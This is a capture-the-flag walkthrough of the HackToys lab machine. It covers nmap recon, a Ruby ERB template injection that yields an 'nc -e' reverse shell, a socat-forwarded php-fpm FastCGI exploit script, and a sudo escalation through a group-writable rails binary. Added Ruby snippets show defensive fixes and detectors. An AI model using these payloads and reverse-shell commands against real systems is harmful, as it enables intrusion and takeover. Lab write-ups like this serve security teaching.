Information gathering
Port scan with nmap
nmap -sS 10.20.73.121 -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:48 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00010s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
MAC Address: 00:0C:29:82:76:43 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Ports 22 and 3000 are open; run nmap -sV against them for service versions
┌──(root㉿kali)-[~]
└─# nmap -sV 10.20.73.121 -p3000,22
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:49 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
3000/tcp open ssl/ppp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:82:76:43 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds
nmap reports SSL on port 3000, so try accessing it over https
Vulnerability discovery
Web foothold
Looking at the five links (as shown in the screenshot), all five are hacking tools
Next, test the input box below them
Entering arbitrary content returns the message "Product does not exist"
That string is the value of the message parameter; change message to 123 to check
The displayed text becomes 123, so there is clearly a reflected XSS here
It is not of much use on its own, though
Checking the site's programming language: it is Ruby
Ruby/ERB SSTI
After some searching, this is an ERB SSTI: the template syntax <%= (ruby code) %> can be used to execute commands
Test it by URL-encoding <%= 7*7 %> and submitting it
The output is 49, which confirms the vulnerability
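An added example (not code from the HackToys application or the writeup) showing why the 7*7 probe works: the vulnerable renderer splices the untrusted message into the ERB template source, while the hardened one keeps the template fixed and passes the value as data. The template wording and function names are assumptions.

```ruby
require "erb"
require "cgi"

# Vulnerable pattern: user input becomes part of the template SOURCE, so any
# <%= ... %> tag inside it is compiled and executed on the server (SSTI).
def render_vulnerable(message)
  template = "Product #{message} does not exist"   # assumed template text
  ERB.new(template).result(binding)
end

# Hardened pattern: the template source is a constant string; the input is
# supplied as a local variable and HTML-escaped on output, so ERB tags in it
# are never parsed, only displayed.
def render_safe(message)
  template = "Product <%= CGI.escapeHTML(message) %> does not exist"
  ERB.new(template).result_with_hash(message: message)
end

# Lightweight detection for access logs or a WAF rule: flag request
# parameters that carry ERB tags at all.
ERB_TAG = /<%[=-]?.*?%>/m
def erb_injection_attempt?(param)
  ERB_TAG.match?(param)
end

if __FILE__ == $PROGRAM_NAME
  probe = "<%= 7*7 %>"
  puts render_vulnerable(probe)       # Product 49 does not exist
  puts render_safe(probe)             # Product &lt;%= 7*7 %&gt; does not exist
  puts erb_injection_attempt?(probe)  # true
end
```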
Try a reverse shell
Build the reverse shell command
<%= system("nc -e /bin/sh 10.20.73.233 5555"); %>
Python is available; use it to spawn a pseudo-terminal
python3 -c "import pty;pty.spawn('/bin/bash')"
Privilege escalation
Ports 80 and 9000 are listening on localhost only; forward both of them out
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 &
[1] 1281
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 &
[2] 1282
lidia@hacktoys:/tmp$ ss -nltp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 5 0.0.0.0:8080 0.0.0.0:* users:(("socat",pid=1282,fd=5))
LISTEN 0 511 127.0.0.1:80 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:9000 0.0.0.0:*
LISTEN 0 1024 0.0.0.0:3000 0.0.0.0:* users:(("ruby",pid=593,fd=7))
LISTEN 0 5 0.0.0.0:9001 0.0.0.0:* users:(("socat",pid=1281,fd=5))
LISTEN 0 128 [::]:22 [::]:*
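An added detection example (not from the writeup): parse `ss -nltp` output and flag wildcard-bound listeners owned by an ad-hoc relay such as socat, which is exactly how the loopback-only services above were re-exposed. The sample output is adapted from the session above; the relay watchlist is an assumption.

```ruby
# Sample `ss -nltp` output, copied from the session above (constructed input).
SS_SAMPLE = <<~SS
  State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
  LISTEN 0 5 0.0.0.0:8080 0.0.0.0:* users:(("socat",pid=1282,fd=5))
  LISTEN 0 511 127.0.0.1:80 0.0.0.0:*
  LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
  LISTEN 0 4096 127.0.0.1:9000 0.0.0.0:*
  LISTEN 0 1024 0.0.0.0:3000 0.0.0.0:* users:(("ruby",pid=593,fd=7))
  LISTEN 0 5 0.0.0.0:9001 0.0.0.0:* users:(("socat",pid=1281,fd=5))
  LISTEN 0 128 [::]:22 [::]:*
SS

# Assumed watchlist of programs that are rarely legitimate network listeners.
RELAY_PROGRAMS = %w[socat nc ncat chisel].freeze

Listener = Struct.new(:addr, :port, :process, :pid)

# One Listener per LISTEN line; process and pid are nil when ss shows none
# (e.g. the socket belongs to another user and ss was not run as root).
def parse_ss(text)
  text.each_line.filter_map do |line|
    cols = line.split
    next unless cols[0] == "LISTEN"
    addr, port = cols[3].rpartition(":").values_at(0, 2)  # handles [::]:22 too
    m = line.match(/users:\(\("([^"]+)",pid=(\d+)/)
    Listener.new(addr, port.to_i, m && m[1], m && m[2].to_i)
  end
end

def wildcard?(addr)
  %w[0.0.0.0 [::] *].include?(addr)
end

# A relay program bound to all interfaces is the signature of a forwarded
# internal service; loopback-only listeners (80, 9000) are left alone.
def suspicious_relays(listeners)
  listeners.select { |l| wildcard?(l.addr) && RELAY_PROGRAMS.include?(l.process) }
end

if __FILE__ == $PROGRAM_NAME
  suspicious_relays(parse_ss(SS_SAMPLE)).each do |l|
    puts "ALERT: #{l.process}[#{l.pid}] listening on #{l.addr}:#{l.port}"
  end
end
```

On a live host, feed it `ss -nltp` run as root so every socket carries its owning process.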
Visit the forwarded port 80
After testing for a long time, no vulnerability was found there
Move the target to port 9000
The target's process list contains php-fpm, whose default port is exactly 9000
https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi
A script found online (on the page linked above) gives direct command execution
Change the port and the path and it works as-is
#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Existing file path on the target
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    # PHP_VALUE overrides ini settings for this request; auto_prepend_file makes
    # php-fpm load the base64 payload before the real script runs.
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT   # 9001 is the socat forward of 127.0.0.1:9000
    cat $OUTPUT
done
php-fpm runs as the dodi user, so pop a reverse shell directly to escalate to that user
Escalate to dodi
Change the command that is executed
#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('nc -e /bin/bash 10.20.73.233 6666'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Existing file path on the target
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT
    cat $OUTPUT
done
Escalate to root
sudo -l shows this user can run the script /usr/local/bin/rvm_rails.sh with sudo
Run the script
dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
Usage:
rails COMMAND [options]
You must specify a command:
new Create a new Rails application. "rails new my_app" creates a
new application called MyApp in "./my_app"
plugin new Create a new Rails railtie or engine
All commands can be run with -h (or --help) for more information.
Inside a Rails application directory, some common commands are:
console Start the Rails console
server Start the Rails server
test Run tests except system tests
It is Rails, the web application framework written in Ruby
Analyze the script
#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"
At the end, the script execs the file /usr/local/rvm/gems/ruby-3.1.0/bin/rails
dodi@hacktoys:/var/www/html$ cat /etc/group | grep rvm
rvm:x:1002:lidia,root
The lidia user has write permission on that file, so writing /bin/bash into it as that user is enough to escalate
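An added audit check (not part of the writeup): given a wrapper script that a sudoers rule allows, follow its final exec line and report whether the target can be modified by anyone other than root. This is the check that would have caught the group-writable rails launcher above. The sample wrapper and target are built in a temp dir with assumed modes; the names mirror rvm_rails.sh only for illustration.

```ruby
require "tmpdir"

EXEC_LINE = /^\s*exec\s+(\S+)/

# The path exec'd by a wrapper script, or nil if it has no exec line.
def exec_target(script_path)
  File.foreach(script_path) do |line|
    m = EXEC_LINE.match(line)
    return m[1] if m
  end
  nil
end

# Reasons the exec target is unsafe to run under sudo; an empty list means OK.
# A sudo rule on the wrapper is only as strong as the weakest file it execs.
def exec_target_findings(script_path)
  target = exec_target(script_path)
  return ["no exec line in #{script_path}"] unless target
  return ["exec target #{target} does not exist"] unless File.exist?(target)
  st = File.stat(target)
  findings = []
  findings << "#{target} is not owned by root (uid #{st.uid})" unless st.uid.zero?
  findings << format("%s is group-writable (mode %o)", target, st.mode) if (st.mode & 0o020) != 0
  findings << format("%s is world-writable (mode %o)", target, st.mode) if (st.mode & 0o002) != 0
  findings
end

# Builds a wrapper/target pair resembling rvm_rails.sh (constructed sample).
def build_sample(dir, target_mode)
  target = File.join(dir, "rails")
  File.write(target, "#!/bin/sh\necho rails \"$@\"\n")
  File.chmod(target_mode, target)
  wrapper = File.join(dir, "rvm_rails.sh")
  File.write(wrapper, "#!/bin/bash\nexport GEM_HOME=/tmp/gems\nexec #{target} \"$@\"\n")
  wrapper
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |dir|
    puts exec_target_findings(build_sample(dir, 0o775))  # reports group-writable
  end
end
```

Run it against /usr/local/bin/rvm_rails.sh on the box and it reports the rvm-group-writable rails file; a target with mode 0755 owned by root produces no findings.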
lidia@hacktoys:/tmp$ echo "/bin/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
lidia@hacktoys:/tmp$
dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
root@hacktoys:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root),1002(rvm)